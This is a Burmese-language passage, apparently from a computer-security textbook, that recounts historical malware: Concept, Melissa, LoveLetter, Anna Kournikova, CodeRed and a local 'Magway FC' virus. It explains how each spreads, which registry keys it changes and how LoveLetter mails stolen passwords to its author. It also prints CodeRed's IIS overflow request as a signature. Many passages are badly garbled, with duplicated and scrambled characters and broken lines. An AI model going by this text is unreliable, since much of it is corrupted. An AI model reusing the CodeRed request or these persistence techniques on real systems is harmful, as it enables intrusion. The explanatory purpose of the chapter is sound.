onf rwlnDaompufvnfywfrIpepfrsm;wGif tvkyfvkyfaom yxrqHk;Adkif;&yfpfjzpfcJhNyD; ¤if;\ypfrSwf
rSm Windows (odkY) MacOS r[kwfbJ Microsoft Word omjzpfavonf/
18/ Adkif;&yfpfonf ul;pufcHxm;&aom Document zdkifudkzGifhwdkif; tvkyfvkyfavonf/ ¤if;
onf Word \ Global Document Template jzpfaom NORMAL.DOT zdkifudkul;puf&efBudK;pm;onf/
Adkif;&yfpfonf Template wGif PayLoad ESihf FileSaveAs Macro rsm;udk&SmazGawGY&SdcJhaomf Template
onf ul;pufcH&NyD;jzpfonf[krSwf,lNyD; ¤if;\vkyfaqmifcsufrsm;udk &yfpJavonf/ tu,fí
NORMAL.DOT wGif PayLoad ESifh FileSaveAs wdkYudkrawGYcJhaomf NORMAL.DOT xJodkY Adkif;&yfpf
Macro rsm;udk pwiful;xnfhavNyD; uGefysLwmzefom;jyifwGif Dialog Box tao;av;wpfckudk jyo
avonf/ Dialog Box wGif *Pef; "1" ESifh OK Button wpfckyg&Sdonf/ þ Dialog onf
NORMAL.DOT tm; yxrqHk;tBudrf ul;pufpOfwGifom jyoavonf/

19/ Adkif;&yfpfonf Global Template tm;ul;puf&efpDpOfNyD;aemuf Save As Command ESifh
odrf;qnf;cJhaom Document zdkiftm;vHk;udk ul;pufavonf/ Adkif;&yfpfr&Sdaom tjcm;uGefysLwmwGif
ul;pufcHxm;aom Document zdkifrsm;udk zGifhcJhygu Akdif;&yfpfonf Global Document Template tm;
ul;pufaprnfjzpfonf/ Adkif;&yfpfwGif AAAZAO? AAAZFS? AutoOpen? FileSaveAs ESihf PayLoad
Macro rsm;yg0ifavonf/ owdjyK&efrSm AutoOpen ESifh FileSaveAs wdkYonf w&m;0iftoHk;jyKaeaom
Macro trnfrsm;jzpfNyD; tcsdKUaomolrsm;onf ¤if;wdkY\ Document rsm;ESihf Template rsm;wGif xdk
Macro rsm;udk toHk;jyKcJhMuNyD;jzpfavonf/ PayLoad Macro udkrl rnfonfhtcsdefwGifrS tvkyfvkyfjcif;
r&Sdacs/ Concept Adkif;&yfpf\rsdK;uGJrsm;rSm Concept.G? Concept.F ESifh Concept.BZ wdkYjzpfonf/
Melissa Worm
20/ 1999? rwf 26 &ufwGif pwifawGY&SdcJhaom Melissa onf Word Macro Adkif;&yfpfESifh
Worm wpfrsdK; yxrqHk;tBudrftjzpf aygif;pyfxm;jcif;jzpfNyD; Microsoft Word 97? Microsoft Word
2000 ESifh Microsoft Outlook 97 (odkY) 98 e-mail Client rsm;ESifh tvkyfvkyfavonf/ Word 95 wGifrl
tvkyfvkyfjcif; r&Sday/ Adkif;&yfpfudk vufcH&&Sd&ef oifhtaejzifh Microsoft Outlook &Sd&efrvkdaomfvnf;
Outlook r&SdvQif tjcm;uGefysLwmrsm;odkY ysHUESHYEkdifjcif; r&Sday/ Melissa onf Windows 95/98/NT ESifh
Macintosh uGefysLwmrsm;udk ul;pufEkdifonf/ tu,fí ul;pufcH&aom uGefysLwmwGif Outlook ESifh
tifwmeufoHk;pGJEkdifjcif; r&Sdaomfvnf; Adkif;&yfpfonf pepfwGif;&Sd Document zdkifrsm;twGif; qufvuf
ysHUESHYaernfjzpfonf/
21/ Adkif;&yfpfonf Microsoft Outlook ESifh Outlook Express vdyfpmrsm;udktoHk;jyKum
tD;ar;vfrsm;rSwqifh rdrdukd,frdrd tjcm;uGefysLwmoHk;pGJolrsm;qD ydkYavonf/ uGefysLwmwpfvHk;udk
ul;pufNyD;wdkif; Outlook Address Book wGif&Sdaom vl 50qD xyfrHul;puf &efBudK;pm;avonf/ þ
Worm ysHESHYrIvsifjref&jcif;rSm tD;ar;vfvufcHolrS Message udkzGifhvkduf½HkrQjzifh ul;pufysHUyGm;apaom
aMumifhjzpfonf/ Melissa tm; Adkif;&yfpftjzpfowfrSwfEkdifovdk Worm tjzpfvnf;owfrSwfEkdifonf/
Melissa onf Hard Drive ay:&Sd rnfonfhtcsuftvufrsm;udk zsufqD;jcif;r&Sdovdk uGefysLwmudk
vnf; jyóemrjzpfapyg/ Microsoft Word Setting udkom tusdK;oufa&mufaponf/ Melissa onf
tD;ar;vf Attachment tjzpfa&muf&Sdavonf/ tD;ar;vf\acgif;pOfwGif ]Important Message from}
ESifhpNyD; ¤if;pmom;aemufwGif tD;ar;vf Account jzifhydkYvdkufol\emrnfwGJygvmonf/ tD;ar;vf\pm
udk,fwGif ]Here' the document you asked for... Don't show anyone else} [líyg&SdNyD; Attachment
ESifhwGJygvmaom Word Document zdkiftm;zGifhygu uGefysLwmtm; ul;pufaprnfjzpfygonf/
22/ Melissa \tponf tifwmeufwGif vGwfvyfpGmaqG;aEG;Muonfh tkyfpkwpfckjzpfonfh
alt.sex tkyfpkrSjzpfavonf/ Adkif;&yfpfudk npfnrf;0ufbfqdkufrsm;twGuf pum;0Sufrsm;yg0ifonfh
LIST.DOC zdkifxJwGifxnfhNyD; ydkYjcif;jzpfonf/ uGefysLwmoHk;olrsm;onf xdkzdkifudk Download vkyfNyD;
Microsoft Word wGifzGifhMuonf/ xdkodkYzGifhaomtcg ¤if;wd\ kY e-mail Alias zdkif(vdyfpmpmtkyf)wGif&Sd
aom tD;vfar;vfoHk;pGJolvl (50)qDodkY LIST.DOC zdkifudk ydkYavonf/ owdjyK&rnfhtcsufrSm Melissa
onf ,cktcgwGif LIST.DOC zdkifwGifomr[kwfawmhbJ rnfonfh Document zdkifxJwGifrqdk ul;puf
a&muf&SdaeavNyDjzpfonf/ vlwdkY\oabmjzpfonfh rdrdodaom rdwfaqGwpfa,mufa,mufqDu ay;ydkY
aom rnfonfh Document zdkifrqdk zGifhMunfhvdkMujcif;udk tcGiafh umif;,lum wdkufcdkufcJhjcif;jzpfav
onf/
nals V 1.0 - rhythm

23/ Adkif;&yfpfpfonf vwpfv\&ufwpfw ckESifh em&D&D\rdepfwdkY w
wdkufqdkifcsdef (Oyrm/ vwpf
v v\
27&ufajrmufaeY 18827 em&D/)w wGif touf0if0 wwfNyD; xd
xktcsdefwGif vuf&SdzGifhxm;aom
x Word zdkifü
W
]Twenty-ttwo points, plus
p triple-wword-score, plus
p fifty poiints for usingg all my letteers. Game's over. I'm
outta herre} pmom;ud udk xnfhoGif;avonf
a /
Loveletter Worm
24/ vlrIuGefef,ufrsm;acwfpm;vmo onfhtcsdefwGiiff vlwpfa,
,muftm; zdkifwpfckudk zGifhap&ef
(odkY) tccsuftvufrs rsm;tm; zGifhccsap&ef vSnfnhpm;jcif;udk 2000 arvv 4&ufaeYwG wGif Lovelettter Worm
ESifhtwl awGYjrif&av vonf/ Woorm onf Microsoft M Ouutlook rS ysHUESHYEdkifovdk mIRC
m Cliennt rSvnf;
ysHUESHYEkdifo
onf/ Adkif;&yfyfpf\uk'ftpwG
p if ]barok -loveletteer(vbe) by spyder / ispyder@mai ail.com /
@GRAM MMERSoft Group
G / Mannila, Philippines} [laommpmom;yg&Sdaavonf/
yHk(17) LOVEYOU Adkif;&yfpfudk

IL tD;ar;vf Attachment
A t
taejzifhwGNyD
JNyD; ydkYxm;yHk
25/ Worm tvkt yfvkyfcsefsd wGif Winddows \ Syystem Directtory (C:\Winndows\Systeem) xJodkY
MSKerneel32.vbs ESif ifh LOVER-LLETTER-FO OR-YOU.TX XT.vbs zdkifwd
wdkYudk yxrq
qHk; ul;xnfahavonf/
Win32DL LL.vbs zdkifud
uk Windowss Directory (C:\Window ws) atmufo odkY ul;xnfhavonf
a / ¤if
¤ ;aemuf
Worm o onf Interneet Explorer \ Home Page wGif WIN-BUGSFIX.exe zdkif&Sd&mudk ñTefjyonfh
vifhjzifht
tpm;xdk;vdufkufonf/
26/ Worm onf tifwmeuf w rS pum;0Sufcdk;,,lonfh Trojjan udk Dow wnload vky yff,lonf/
uGefysLwmmzGifhpcsdefwGifi Trojan onf
o ]BARO OK..} trnf nfjzifh azsmuf
ufxm;aom Window udk&SmazG&ef
BudK;pm;Nyy;D tu,fí&S&dcJhvQif Trojjan onf tvkt yfrvkyfawmhw bJ csufcsif
c ;ydwfoGm;avonf/ rr&SdcJhvQifrl
Trojan onf ]HKEY_LOC
H CAL_MACH HINE\Softwaare\Microsofft\Windows\\CurrentVerssion\Run}
atmuf&d&Sd WinFAT332 Subkey udkppfaq;av vonf/ t tu,fí WiinFAT32 Suubkey udkraawGYcJhvQif
Trojan onf xdk Key udkzefwD;NyD; rdrd rdukd,frdrd \Windows\SSystem\ Diirectory at tmufwGif
WINFAT T32.exe tjjzpf yGm;,lvdvdkufNyD; xdkae&mrS
e aeí tvk t yfvkyfavonfv / xY xdYkaemuf Troj ojan onf
Internet Explorer
E \ Home Pagge ae&mwGif ]about:blannk} [kjyifav vonf/ ¤if;aemuf
; Troojan onf
atmufyg yg Key rsm;ud
udk zsufypfav
vonf-
(u) Software\Miicrosoft\Winndows\CurreentVersion\PPolicies\Netw work\HideShharePwds
( c) Software\Miicrosoft\Winndows\CurreentVersion\PPolicies\Netw work\ DisabllePwd
C
Caching

( *) .DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Network\
HideSharePwds
(C) .DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Network\
DisablePwdCaching
27/ Trojan onf MPR.DLL zdkifudkul;wifNyD; WNetEnumCashedPasswords function udkac:
oHk;um cdk;xm;aom RAS pum;0Sufrsm;ESifh Cache tjzpfodrf;xm;aom Windows \ pum;0Sufrsm;udk
Trojan a&;om;ol\tD;ar;vfvdyfpmjzpfaom mailme@super.net tD;ar;vfvdyfpmodkY ydkYavonf/
onf tD;ar;vfrsm;udkydkY&ef Mail Server jzpfaom smtp.super.net.ph udktoHk;jyKavonf/ tD;ar;vf\
acgif;pOfonf ]Barok... email.passwords.sender.trojan} jzpfNyD; pmukd,fwGif ] barok... i hate go to
school suck -> by:spyder @Copyright (c) 2000 GRAMMERSoft Group> Manila,Phils} [laom
pmom;yg&Sdavonf/
28/ LoveLetter onf tD;ar;vfvufcHolrsm;qDodkY ar;vfwpfapmifomydkYavonf/ ar;vfwpf
apmifydkYNyD;onfhaemufwGif ¤if;onf Registry wGifrSwfxm;NyD; ar;vfrsm;udk xkESifhxnfESifh qufydkYjcif;
r&Sdawmhacs/ xdkYaemuf Adkif;&yfpfonf Folder rsm;rS ¤if;vdkcsifaomzdkiftrsdK;tpm;rsm;udk &SmazGNyD;
¤if;\uk'frsm;ESifh tpm;xdk;ypfavonf/ tpm;xdk;cH&aomzdkifrsm;\ Extension rsm;onf .vbs (odkY)
.vbe jzpfEdkifonf/ Adkif;&yfpfonf .js? .jse? .css? .wsh? .sct ESifh .hta wdkYESifhpaomzdkifrsm;twGuf
¤if;\rl&if;emrnftwdkif;ay;NyD; zdkiftopfrsm;udkzefwD;onf/ uGJjym;csufrSm zdkiftopf\ Extension rSm
.vbs jzpfjcif;yifjzpfonf/ rl&if;zdkifudk zsufypfrnfjzpfonf/ ¤if;wdkYudkvkyfaqmifNyD;aemuf Adkif;&yfpfonf
.jpg ESifh .jpeg "mwfyHkzdkifrsm;udk&SmazGNyD; zdkiftopfrsm;zefwD;um rl&if;zdkifrsm;udk zsufypfavonf/
xdkYaemuf Adkif;&yfpfonf .mp3 ESifh .mp2 oDcsif;zdkifrsm;udk&SmazGNyD; zdkiftopfrsm;zefwD;um rl&if;zdkifudk
zGufxm;avonf/ jzpfpOfESpfckvHk;wGif topfzefwD;vdkufaom zdkifrsm;onf rl&if;zdkifemrnfrsm;jzpfNyD;
xyfwdk;taejzifh .vbs extension om&Sdavonf/ (Oyrm - pic.jpg tpm; .pic.jpg.vbs)
29/ þ Malware onf 45oef;ausmfaomuGefysLwmrsm;udk ysHUESHYcJhNyD; pawmhaps;uGufrsm;?
tpm;taomufukrÜPDrsm;? rD'D,m? um;ukrÜPDrsm;? {&mrenf;ynmukrÜPDBuD;rsm; tygt0if urÇm
wvTm;&Sd tpdk;&at*sifpDrsm;? wuúodkvfrsm;? aq;ausmif;rsm;udk tusdK;oufa&mufapcJhonf/ zdkY'farmf
awmfum;ukrÜPDonf ¤if;\tD;ar;vfpepfudkydwfypfcJh&NyD; *sife&,farmfawmfum;ukrÜPDonfvnf;
Worm \ wdkuf½dkufoufa&mufjcif;rcHcJh&onfhwdkif ukrÜPD\ Outlook udk toHk;jyKEdkifjcif; r&SdcJhawmh
acs/ Worm onf tdrfjzLawmf0ufbfqdkuftm; Denial-of-Service (DOS) wdkufcdkufrI jyKcJhavonf/
Worm aMumifh JPEG "mwfyHkaygif; 40GB cefYqHk;½HI;cJh&NyD; Worm \zsufqD;rIonf tMurf;zsif;tm;jzifh
8.75 bDvD,Ha':vmESifh 10 bDvD,Ha':vmMum; &SdcJhavonf/ þ Worm y½dk*&rfudk zdvpfydkif?
Makati NrdKU&Sd AMA uGefysLwmwuúodkvfausmif;om; Onel A. de Guzman ua&;om;cJhNyD; a[mif
aumifwGif Worm udk yxrqHk;awGY&SdcJh&avonf/
The Anna Kournikova Adkif;&yfpf
30/ Kournikova Adkif;&yfpfonf Visual Basic Script Worm jzpfonf/ ¤if;udk OnTheFly
[kvnf;ac:onf/ Worm Construction Kit jzifh zefwD;cJhjcif;jzpfonf/ þ Worm onfay:vGifcJhonf/
tb,faMumifhqdkaomf Adkif;&yfpfESifh Worm Construction Kit rsm;onf tvkyfvkyfaomuk'fudk xkwfay;
EkdifcJaomaMumifhjzpfonf/ emrnfBuD;&jcif;taMumif;&if;onf vlrIuGef,ufenf;AsL[mudk toHk;cscJh
nals V 1.0 - rhythm

jcif;aMummifhjzpfEdkifNyD; emrnfausmfmfwif;epfr,f Anna Kouurnikova \yHyHkudktoHk;jyKNyD NyD; ypfrSwfo
om;aumif
tm; Woorm udktvkyfyfvkyfckdif;ap&&ef qGJaqmififEkdifcJhonf/
31/ OnTheF Fly onf tD;ar;vf
; Attaachment ta aejzifhvmNyD; Subject wGifif ] Here youu have, ;o}
[kyg&Sdon nf/ pmukd,ae&mwG
,f if ]Hi,
H Check This!T } [ka&;om;xm;av vonf/ Attaachment on nf 2, 853
Byte &Sdaoom .vbs zdkififjzpfNyD; emrrnfrSm AnnaaKournikovaa.jpg.vbs jzpfpfonfhtwGuf u tD;ar;vf vfvufcHol
tm; wifif;epfr,f\"mwfyHkarQmfvif v hcsufjzifh zif
zG hMunfhrdap&&ef wdkufwGefef;ovdkjzpfavonfv /
32/ tvkyvk f yfcsdefwGif Adkif;&yfpfonf
v n Current User Registtry Key at tmufwGif \SSoftware\
OnTheFlly\mailed udkzefwD;avo onf/ Worm m onf ar;vf a ydkYNyD;jcifif; &Sd? r&Sd qHk;jzwfEkdif&ef
& twGuf
Registry wGif wefzdk; "1" &Sdr&Sd p ppfaq;avo onf/ "1" rjjzpf z cJhaomf Outlook
O Addrress Book wGif&Sdaom
tD;arvf;;vdyfpmwdkif;odkY rdrdudk,frdrrd ydkYNyD; Registry wGif "1" " wefzdk;udk vmxnfhavonf/ ar r;vfydkYjcif;
tvkyfNyD;;qHk;aomf Worm W onf qufvuftvk t yfvkyfavonf v / tu u,fí &uf ufpGJonf Zefee0g&D 26
jzpfcJhaomfmf OnTheFlyy onf e,f ,fomvefEdkifiHi&H Sd 0ufbfpmrsuf
m ESmjzpfonfo h http://w www.dynabbyte.nl udk
zGifh&efBudK;pm;avon nf/ OnTheFFly onf wrif&nf½G,f , zsufqD;rIrsm;rvkyfcJhaomf a vnf; ¤if;onf
Mailbox rsm;udkjynfhapcJ a hum Ressoure rsm;ud udkoHk;pGJcJhavoonf/ uGefysLwmoef;ESifhcsDNyD; ul;puf ufcHcJh&um
Worm aMMumifhqHk;½HI;cJh&onfhwefz;rS zdk m 1668227 a':vm jzpfonf/
33/ Worm ud ukzefwD;cJhol
olrSm e,fomvef m EkdifiHrS 20ESpft½G,f ,f&Sd uGefysLw wmqdkiftvkyyfform;ESifh
ausmif;om;j
o zpfonfh Jan De Wit W jzpfNyD; De D Wit onf nf uGefysLwmmy½dk*&rfudk rnfodkYa&;&rrnfudkyif
trSefwu u,f rodcJh&S&Smay/ olonf o VBS Virus Generator Toolkit udktoHk;jyKcavonf cJh / WWorm \
w&m;0iftrnfrSm OnTheFly O jzpf
z NyD; rD'D,mrsm;url
m Annna Kournikkova \trn nfudkom oHk;EIef;cJhMu
avonf/
CodeRed
d
34/ CodeReed onf 200 a Worm jzpfonf/
01 ckESpfwGif bDvD,Ha'::vmESifhcsDí qHk;½HI;apcJhaom
¤if;wGif ]Hacked by Chinese} pmmom;yg&SdNyD; Deface enf nf;jzifh ¤if;wdkufcdkufonfh 0ufbfpmrssufESmrsm;
wGif xdkpmrsm;ud
p k azzmfjyavonfnf/ yHk(18)/ ¤if
¤ ;onf rSwfwOmPfxJwGifomtvkyvk v
f yfonfh tenf
t ;i,f
aom W Worm rsm;xJ xJrSwpfckjzpfNyD
NyD; Hard Drive
D wGifa&&m? tjcm;od odrf;qnf;Edkiaomypö
f nf;rrsm;wGifyg
rnfonfnzdh kifrS csefxm;&pf
m jcif;r&Sdacs
a /
yHk(18) D
Deface vkyfcHxm;&onf
x h t wmeufppmrsufESm
tif

35/ CodeRed onf Server ü TCP Port 80 wGif GET /default.ida Request jzifha&muf&SdvmNyD;
Request wGif Microsoft's Internet Information Server (IIS) \ tm;enf;csufudk wdkufcdkufaomuk'f
yg&SdNyD; Worm udk IIS Server wGif;&Sduk'fudk tvkyfvkyfapavonf/ ¤if;onf rSwfOmPfwGif;wGifom
vHk;0tvkyfvkyfNyD; Disk ay:wGif &SmrawGYEdkifay/ yHk(19)/ ¤if;\uk'fzdkift½G,ftpm;onf 3569 Bytes
&Snfvsm;avonf/
GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNN NNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090
%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u5
3ff%u0078%u0000%u00=a HTTP/1.0
yHk(19) CodeRed \ Signature
36/ CreateThread API udktoHk;jyKNyD; Worm onf ¤if;\udk,fyGm; Thread wpf&mudkyGm;&ef

BudK;pm;avonf/ odkYaomf ¤if;uk'ftwGif;&Sd trSm;t,Gif;wpfckaMumifh wu,fwrf;wGif xdkxufydkNyD;
zefwD;Edkifavonf/ xkdYaMumifh ul;pufcH&aomuGefysLwmonf CPU oHk;pGJrIudk jrifhrm;apygonf/
Thread wdkif;onf C:\Notworm udkppfaq;NyD; xkdzdkif&SdvQif Worm onftvkyfrvkyfawmhyJ teEÅNidrf
oufrItajctaeudk a&mufaponf/ Notworm zdkif\yHkpHudk rnfolrQ wdwdyyrod&SdMuay/ xdkzdkifonf
Worm zefwD;ol\ uGefysLwmwGifom&SdEkdifNyD; ¤if;\uGefysLwmudk rul;pufapEkdif&eftwGuf umuG,f
&efjzpfonf[k tcsdKUolrsm;u xifaMu;rsm;ay;Muavonf/
37/ tu,fí &ufpGJonf vwpfv\ 20&ufESifh 28&ufaeYMum;jzpfaomf Worm onf
198.137.240.91 \ Port 80 odkY rqDrqdkifaomtcsuftvufrsm;udk ydkYrnfjzpfonf/ ¤if;aemuf
tdrfjzLawmf\ Internet Protocol(IP) vdyfpmodkYvnf;ydkYrnfjzpfonf/ (tdrfjzLawmfonf þ Worm
aMumifh IP vdyfpmajymif;cJh&avonf/) Worm onf 28&ufaemufydki;f wGif teEÅNidrfoufrItaet
xm;odkYa&mufoGm;NyD; wrif&nf½G,fNyD;zGifhjcif;r[kwfbJ xdktaetxm;rS Edk;xEkdifjcif;rjyKawmhacs/
100 ajrmuf Thread onf Server \ 0ufbfpmrsufESm toHk;jyKxm;aom bmompum;udkppfaq;NyD;
bmompum;onf US English jzpfaomf pmrsufESmudk ajymif;vJypfavonf/ vwpfv\ 20&ufaeY
rwdkifcifwGif 99ckaom Thread rsm;onf usyef; IP vdyfpmrsm;udk ypfrSwfxm;NyD; uGefysLwmrsm;udk
wdkufcdkuf&efBudK;pm;avonf/ vuf&Sdul;pufcHxm;&aom uGefysLwmudk tBudrfBudrf ul;pufjcif;rS
a&SmifMuOf&eftwGuf IP vdyfpm 127.*.*.* udkrl HTTP Request jyKvkyfrnfr[kwfyg/ CodeRed onf
2001 Zlvdkif 28 &ufaeYwGif teEÅNidrfoufjcif;taetxm;odkY a&muf&SdoGm;NyDjzpfojzifh ysHUESHYrI&yfoGm;
NyDjzpfavonf/ wrifwum tvkyfvkyfapcdkif;jcif;r&SdcJhvQif Worm onf xyfrHEdk;xysHUESHYEdkifvdrfhrnf
r[kwfaMumif; ,HkMunf&ayonf/

tcef;(5)
jynfwGif;jzpfAdkif;&yfpfrsm;
ed'gef;
1/ EkdifiHwumrS a&;om;xkwfa0aom Adkif;&yfpfrsKd ;pHkonf jynfwGif;odkY ul;pufysHUyGm;cJhaomf
vnf; jynfwGif;ü 2008 ckESpftapmydkif;xd vufwnfhprf;a&;om;Muonfh y½dk*&rfi,fav;rsm;rSty
jynfwGif;rS y½dk*&rfrmrsm;a&;om;aom Adkif;&yfpfrsm; wGifus,fpGmysHUESHYcJhjcif; rawGY&Sd&ay/ tjcm;EdkifiH
rsm;ESifh rwlnDonfhtcsufrSm jynfwGif;wGif y½dk*&rfa&;om;jcif;udk vlenf;pkuom vdkufpm;MuNyD;
jynfwGif;jzpfAdkif;&yfpfrsm;udk a&;om;oltrsm;pkrSmvnf; Developer rsm;omjzpfaMumif; awGY&avonf/
2008 ckESpf aemufydkif;wGif zsufvdkzsufqD; &nf½G,fcsufjzifha&;om;xm;aom Adkif;&yfpftcsdKU xGufay:
vmMuavonf/ tm;omcsufwpfckrSm jynfwGif;&Sd Adkif;&yfpfzefwD;olrsm;onf y½dk*&rfa&;om;jcif;wGif
uRrf;usifrItm;enf;aeao;jcif;? Adkif;&yfpfa&;om;olrsm;onf tGefvdkif;wGif&Sdaom uk'frsm;udk tajccH
í wkya&;om;Mujcif;? Adkif;&yfpfrsm;\ tvkyfvkyfyHkESifh oabmobm0udk aumif;pGmem;vnfxm;jcif;
r&Sdao;jcif;aMumifh zdkifrsm;twGif;odkY uk'frsm;udk oGif;EdkifaomAdkif;&yfpfrsm;? Polymorphic Adkif;&yfpfrsm;?
Metamorphic Adkif;&yfpfrsm;uJhodkYaom ½IyfaxG;aom? tqifhjrifhaomAdkif;&yfpfrsm; ay:xGufcJhjcif; r&SdcJh
yg/ xdkYaMumifh jynfwGif;rS zefwD;vdkufaomAdkif;&yfpfrsm;udk jynfwGif;rSynm&Sifrsm;jzifhyif EdkifEkdifeif;eif;
ESdrfESif;EdkifcJhonfudk awGY&Sd&ayonf/ Adkif;&yfpftrsm;pkudkMunfhvQif Script bmompum;rsm;jzifh a&;om;
jcif;? zdkifrsm;udk ae&mwpfckckodkY ul;jcif;? zdkifrsm;udkzGufjcif;? Process wpfckxufydkí tvkyfvkyfaeMu
jcif;? Registry Setting rsm;udkjyifjcif; ponfh wlnDaomvu©Pmrsm;udkom awGY&ygonf/
Magway FC Virus
2/ 2010 ckESpfwGif ysHUESHYcJhNyD; AutoIT Script bmompum;jzifha&;om;xm;avonf/
Windows Logon vkyfonfhtcgwGif explorer.exe ppfppfjzifh 0ifa&mufjcif;r&SdapbJ MGY.exe zdkifrS
trnfajymif;xm;aom explorer.exe jzifh0ifa&mufEdkifap&ef MGY.exe udk Windows Directory
(C:\Windows) &Sd&m odkYul;ydkYavonf/ MGY.exe onf trSefwu,fwrf;wGif Windows XP SP1 \
explorer.exe zdkif&Sd Icon? "Winner of MNL Challenge Cup 2009" ESifh "Magway FC" pmom;rsm;udk
jyKjyifxm;aom explorer.exe zdkifomjzpfavonf/ xdkYaMumifh Start Menu \ "start" ae&mwGif
"Magway FC" ay:aejcif;jzpfonf/ yHk(20)/
3/ Adkif;&yfpfonf C:\Windows\System32\{271287-000021-100287-705016} Directory
atmufodkY smss.exe? csrss.exe? lsass.exe? icserv.exe ESifh autorun.inf zdkifrsm;udk ul;ydkYavonf/
Adkif;&yfpftvkyfvkyfcsdefwGif msconfig.exe zdkif (System Configuration Utility)ESifh rstrui.exe zdkif(System
Restore Service)udkomac:,loHk;pGJygu uGefysLwmukd ydwfaprnfjzpfonf/ xdkYaemuf Process tae
jzifh tvkyfvkyfaeMuaom winsystem.exe? handydriver.exe? kerneldrive.exe? Wscript.exe? cmd.exe?
nod32krn.exe ESifh nod32kui.exe zdkifrsm;udk ydwfypfavonf/ xdkYaMumifh uGefysLwmoHk;pGJolrS Adkif;&yfpf
tm; VB Script (.vbs) odkY Batch (.bat) zdkifrsm;ESifh ESdrfESif;&efBudK;pm;rnfqdkygu Wscript.exe ESifh
cmd.exe wdkYudk csufcsif;ydwfaprnfjzpfygonf/ Adkif;&yfpfonf Command Prompt udkzGifhvQif csufcsif;
ydwfaomaMumifh tu,fí Command Prompt udkac:oHk;vdkvQif C:\Windows\System32 Directory
atmuf&Sd cmd.exe udk cmd2.exe odkYtrnfajymif;rSom Command Prompt udktoHk;jyKEkdifrnfjzpfyg
onf/
nals V 1.0 - rhythm

yHk(200) Magway FC Adkif;&yfpfpful;pufcHxm;&aom

x W
Windows XP pepf
4/ ¤if;aemmuf Adkif;&yfppffonf Reggistry wefzdk;tcs ; dKUudk jyif&efBudK;pm;aavonf/ W Windows
pwifcsdefwdkif;wGif tvk t yfvkyfEdki&ef
if twGuf HKLM\ SO OFTWARE\\ Microsoft\\ Windows\\ Current
Version\R Run atmu ufwGif mgy..exe ESifh C:\Windows\SSystem32\{2271287-0000021-100287--705016}
Directoryy atmufwG wGif ae&mcsx xm;cJhaom csrss.exe y½d y k*&rfwYdk\ vihfrsm;udk vma&mufx xm;&Sdav
onf/ t txl;owdjyK&&efrSm mgy.eexe onf 166,417,245 Byytes zdkift½G,f ,tpm;&Sdaom o Adkif;&yfppffzdkifjzpfNyD;
MGY.exe onf 1,03 32,704 Bytees zdkift½G,ftpm;&Sdaomm explorer.eexe zdkifudk Resource
R rsm;; jyifqif
xm;onf nfhzdkifomjzpfonf o / tv vm;wl C:\Windows\SSystem32\{2271287-0000021-100287--705016}
atmufwG wif ae&mcssxm;cJhaom smss.exe ESifh csrss.eexe zdkifwd wdYkonfvnf; Windows pepfwGif
wpfcgwn nf;yg0ifvmo onfh smss((Session Maanager Subssystem) zdkifESESifh csrss(Cliient Server Runtime
Subsystem) zdkifrsm;r r[kwfbJ Adkifif;&yfpfu xifx a,mifxifrSm;jzpfap&eef zefwD;emrrnfay;xm;jjcif;rQom
jzpfonf/ Windows pepf p wGif wcgwnf;yg0ififonfh smss..exe ESifh csrsss.exe zdkifwdkYonf o System m Service
taejzifh tvkyfvkyfMuj M cif;jzpfNyD; Adkif;&yfpfrsm;uJ
m hokdY Userr Mode wGif tvkyfvkyfjcif j ;r&Sday/ smss.exe?
csrss.exee? mgy.exe zdkifwdkYonf zdkift½G,ftpmm; wlnDaMumif Mu ; awGY&SdEkdiifygonf/
5/ Adkif;&yfpfpfonf uGefysLwm\tcsd
y efudkzwf½INyD; vuf&Sdvonfo Zlvdkifvj v zpf? rjzpf ppfaq;
um Zlvd vdkifvjzpfcJhvQ vQif HKLM M\SOFTWAR RE\MGY atmuf a wGif COUNT wef w zdk;udk "11" tjzpf
owfrSw wavonf
f / ¤if
¤ ;aemuf COUNT
C weefzdk;udk wpfBudrfvQif wpf
w aygif;oGm;avonf
; / tu,f
t í
COUNT wefzdk;onf nf "10" jzpfcJhaomf expplorer.exe udkacwåydwfvd vkufNyD; MG GY.exe udkcPtvkyf
vkyfapoonf/ MGY.eexe tvkyfvk vyfaecsdefwGifif Adkif;&yfpfzdkifu MGY.eexe udk explorer.exe trrnftjzpf
emrnfajy jymif;um ul;avonf/ ul;NyD;aomf vuf&Sdtvkyfvkyfaeomm MGY.exe udkydwfypfNyD; jyifqif
xm;aomm explorer.exxe udkzGifhavonfv / xdkYaemuf e HKLM M\SOFTWA ARE\MGY atmuf&Sd OB BJ1 wefzdk;
udkzwfNyD; xdkwefzdk;onfo "READ DY" jzpfygu u icserv.exe zdkifESifh lsasss.exe zdkifwdkud
Y k tvkyfvk
vyfaprnf

jzpfonf/ MGY.exe tjzpfrS explorer.exe tjzpfodkY jyKjyifajymif;vJxm;aomzdkifu start pmom;
ae&mwGif MagwayFC pmom;udkjyornfjzpfNyD; lsass.exe zdkifu Magway FC toif;\vdk*dkudkjyornf
jzpfonf/ xdktcg yHk(20)wGifjrif&aom Adkif;&yfpful;pufcHxm;&onfh taetxm;udk jrifawGY&rnfjzpf
onf/
6/ Adkif;&yfpfonf HKCU\Software\Microsoft\Windows\CurrentVersion atmuf&Sd \Explorer
\Advanced rS SuperHidden? ShowSuperHidden? HideFileExt? Hidden wefzdk;rsm;? Policies\Explorer
rS NoFind? NoFolderOptions? NoDriveTypeAutorun wefzdk;rsm;? \Policies\System rS DisableRegistry
Tools? DisableTaskMgr wefzdk;rsm;udkajymif;vJypfavonf/ xdkYaMumifh Akdif;&yfpful;pufcHxm;&vQif
zGufxm;aomzdkifrsm;udk Folder Option rSac:rMunfhekdifjcif;? zGufxm;aomzdkifrsm;udk Search Box
rSr&SmEdkifjcif;? Drive rsm;udk Autorun aponfhvkyfaqmifcsufrsm;oGif;jcif;? Registry wefzdk;rsm;udk
rjyifEkdifap&ef Registry Editor udktoHk;jyKcGifhydwfyifjcif;? Adkif;&yfpftvkyfvkyfaeonfudk rod&Sdap&ef
